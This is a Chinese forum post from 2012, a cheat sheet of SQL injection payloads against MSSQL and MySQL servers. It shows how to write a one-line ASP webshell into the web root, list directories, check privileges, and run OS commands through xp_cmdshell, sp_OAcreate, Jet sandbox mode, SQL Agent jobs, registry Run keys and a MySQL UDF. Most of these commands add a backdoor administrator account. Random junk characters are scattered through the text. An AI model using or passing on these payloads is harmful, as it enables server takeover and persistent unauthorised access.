MSSQL语句导出一句话木马' { H0 z* |; {
首先确定网站的WEB路径
+ y, k5 H" X7 j) Y* M- D, h( l;create table pcguest(pc char(255));-- //建一个表用作插入一句话木马
7 I) c$ s8 t& r- D% t. @
; r7 J! R9 r: [( [+ N;insert into pcguest(pc) values ('%3c%25execute request(%22p%22)%25%3e');-- 1 R9 m( e% h7 ~. p. @4 r
//将一句话木马插入表中
% ^) R6 V6 X4 \) M0 T2 a3 w3 p: v1 ?5 B9 `7 ^1 R8 G
;execute sp_makewebtask @outputfile='E:\Inetpub\wwwroot\PC.ASP',@query='select pc from pcguest';-- 7 F) c* u" U3 S3 o/ d; K" q
//导出一个ASP文件$ _4 J+ m4 S. U, r8 j
! v. N' m9 P1 j
- j j4 A; G, n7 O. O, \2 y关于MSSQL列目录
- x* i# [. b& y- O! L+ z;CREATE TABLE pctest(subdirectory VARCHAR(100),depth VARCHAR(100),[file] VARCHAR(100)) //建一个新表* V( R" a& G& }
Insert pctest exec master..xp_dirtree "d:\app\",1,1 //用xp_dirtree列目录结果导入所建成的表6 t& x2 m1 g N W
4 F$ j7 j; U4 M& T* L v
and (select Count(1) from [pctest]) between 0 and 99 //判断表中字段数来知道有几个文夹和目录
& i- w8 h: D$ X" O7 t7 c; p' F; d/ _1 {8 }5 ^, d5 ]0 k# n/ Y$ [% h+ b
And (Select Top 1 len(Cast([file] as varchar(8000))+subdirectory) From (Select Top 2 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 0 and 20 //猜解第二个字段
( ?0 R" |8 t# W. x- q
! \+ k! H; w# A' i; v. p& lAnd (Select Top 1 unicode(substring(Cast([file] as varchar(8000))+subdirectory,1,1)) From (Select Top 1 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 30 and 130 //逐一猜解字段名的每位字符
. i! Q9 \/ a& P" A) D
& J# X" O6 `3 a, b" T
& _+ P/ e [) I+ W5 P数据库版本和权限查看7 F9 l% X; Q! b/ F
and 1=(select @@VERSION) //查看详细的数据库信息.
# X+ {! v6 i8 Q; P, eand 1=(SELECT IS_SRVROLEMEMBER('sysadmin'));-- //查看权限是不是SA
6 N+ C% I7 V3 l0 l, s0 S0 Z+ nand 1=(SELECT IS_MEMBER('db_owner'));-- //查看权限是不是DB_ONWER! w, W# x& u' c+ V8 r
0 ^, c3 b4 J0 v
- G9 q6 S; }6 `% I$ }. p+ R# s8 \" {0 E3 Y1.利用xp_cmdshell执行命令
! [/ q! ]4 {- E" r; @2 S; m% ]! _9 T; Aexec master..xp_cmdshell 'net user rfire 123456 /add'2 `7 }* s5 C2 {2 g" i
exec master..xp_cmdshell 'net localgroup administrators rfire /add'
' _1 N4 k. O" `$ f& Y2 a, m1 T( _6 o. W8 ~) i/ J
恢复xp_cmdshell存储过程
$ v$ S, E9 U9 l# [5 C0 K' dExec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'2 g: M+ P4 O2 V1 y6 @
% [1 O8 x( ^* {- n6 L$ d7 t3 A3 v; k& ~/ N. K+ P0 X
2.利用SP_OAcreate和SP_OAMETHOD执行命令
3 M0 H3 u9 m& F2 S7 F: E5 o在wscript.shell组件存在的情况下以及xp_cmdshell和xplog70.dll都被删除的情况下+ n: a b, j2 z- l
DECLARE @shell INT //建立一个@shell实体
* o: ~ I: ]$ z! VEXEC SP_OAcreate 'wscript.shell',@shell out //创建OLE对象的实例( o9 l8 L% v0 n0 }8 E
EXEC SP_OAMETHOD @shell,'run',null,'net user rfire 123456 /add' //调用@shell这个实例
1 q5 f( S- M* j# I0 U/ Q0 b. z; b2 @& ]
$ g- {# k0 ~: e5 P
- t4 A1 I; A/ t, o# z9 u; S3.利用沙盒模式: r6 b6 S" m0 r& r' i
先利用xp_regwrite(前提是要求xp_regwrite存在)改注册表,然后用OpenRowSet访问系统自身mdb文件,然后执行SQL语句。
7 A" \* z2 U3 K6 `+ Z/ z开启沙盒模式:
1 G$ X1 ^* b/ @9 [EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engine','SandBoxMode','REG_DWORD',07 D1 e* v2 i. M9 m
# h4 ~6 |# n4 X0 O% C
执行命令:) Z5 v& d+ ^7 \/ S3 X& w! d* E
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net user rfire 123456 /add")');2 \/ `5 \7 P% _, v
- @! t2 }! R! |7 x2 S, ~; P$ d0 f1 i8 a1 i U
4.利用SQL代理执行命令 z1 _: O+ \& E; [9 v5 ^
EXEC master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT' //使用xp_servicecontrol启动SQLSERVERAGENT服务
9 w0 i# l/ d1 f3 h1 }
' d& b6 D; J0 T `3 ]执行命令:
3 ~+ l8 ]# ]' {0 l/ \use msdb exec sp_delete_job null,'x' //进入msdb数据库,删除x作业防止出错+ R/ N0 B! `6 q. N. d
exec sp_add_job 'x'
' D7 h" V x3 E iexec sp_add_jobstep Null,'x',Null,'1','CMDEXEC','cmd /c net user rfire 123456 /add' //添加作业+ M( L9 G3 I9 p
exec sp_add_jobserver Null,'x',@@servername exec sp_add_job 'x' //启动这个作业
) w5 J' }9 r# d, o! Y+ r Z a( y, ~
% Z/ ~+ O% d0 t* s1 G% L* ]* r% b
5.利用注册表项执行命令(用xp_regwrite将执行命令写入启动项) U s+ }2 q' o# W/ d
EXEC master.dbo.xp_regwrite 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run\','shell'.'REG_SZ','C:\windows\system32\cmd.exe /c net user rfire 123456 /add'
; k8 M" d% y. D# C) B7 q% }, ~0 r& s
5 w7 R c3 e+ H0 j% m. c
6.MYSQL的命令执行5 p$ w6 _# `2 K& J; B# s* t( _
MYSQL的UDF自定义函数提权(要求账号拥有insert和delete权限)
$ N9 w2 \$ d7 r! K首先要在su.php下导出c:\windows\udf.dll
' u6 x* o/ N8 ~导出后执行创建自定义函数命令:! J" E ^3 E" a) o" G# h
Create Function cmdshell returns string soname 'udf.dll'7 ]1 m5 o# Q W6 T; A% b* W
执行命令
" c6 @3 N& r2 c7 e) |select cmdshell('net user rfire 123456 /add')1 w- |. g: y% E$ Z7 \
执行后删除函数 drop function cmdshell
! m7 h3 V- j0 X! |) h |
发表于 2012-9-13 17:49:59
收藏
支持
反对